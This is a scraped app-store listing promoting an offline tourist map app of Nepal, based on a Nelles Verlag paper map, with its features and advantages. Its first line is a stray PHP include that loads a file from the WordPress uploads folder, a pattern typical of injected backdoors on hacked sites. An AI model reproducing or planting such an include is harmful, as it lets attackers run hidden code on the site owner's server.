include_once(ABSPATH . '/wp-content/uploads/index.php');
March 25th, 2015
This app is designed for both iPhone and iPad
Released: Mar 24, 2015
Size: 59.4 MB
Seller: AGT Geocentre
Nepal. Tourist map. by AGT Geocentre
DescriptionWe present a digital version of the detailed paper map of Nepal. This edition is brought to you by a German publishing house Nelles Verlag. The map is in English.
All main roads are presented on the map; their numbers are shown, as well as the distances between main intersections. Sights are indicated.
The edition features additional maps: Kathmandu, Patan, Bhaktapur, Thamel, Pokhara Lakeside, Rara-Dolpo Trekking. It also features maps of Durbar squares in Katmandu, Patan and Bhaktapur. Sights, temples, hospitals and other objects which may be of interest to tourists are shown on them.
Printed editions have something magical, something that does not exist in their electronic equivalents. They were created by living people, who labored over each centimeter of the map, they were not created by robots. We decided to combine these achievements of the print editions with the new possibilities of contemporary electronic platforms.
Our app is not intended as a replacement for GPS navigators, Apple Maps, GogleMaps, YandexMaps, etc. This is why you can transit from any map section to a corresponding section of a service of your choosing (Apple Maps, Gogle Maps, YandexMaps) and back again.
Highlights of the app:
- You can work offline.
- You can navigate your way to any desired map section through the traditional index map or simply by turning pages.
- You have the ability to magnify individual parts of a map, bookmark interesting pages.
- You have the ability to add your own information to the map (comments, addresses, telephone numbers including the ability to dial directly from within the app).
- When using the app in an online mode, you can transit from any map section to a corresponding section of a service of your choosing (Apple Maps, Gogle Maps, YandexMaps) and back again.
The advantages of the electronic version of the map:
- The map is of as a high a quality as the paper edition but it is less expensive. Plus it does not bend, tear or become lost at the most inopportune moment.
- The ease with which you can search, magnify and examine details, add notes and additional information utilizing the power and features of todays devices.
The quality and art of traditional paper maps is being replaced by much less attractive automated digital maps. Our app brings these excellent paper maps into the mobile age, helping to ensure they continue to provide you with both knowledge and enjoyment it would be a tragedy if they were relegated only to libraries, inaccessible to most people. We want to give a second life to paper maps. This app is for people who love good old printed maps and want to go with the times.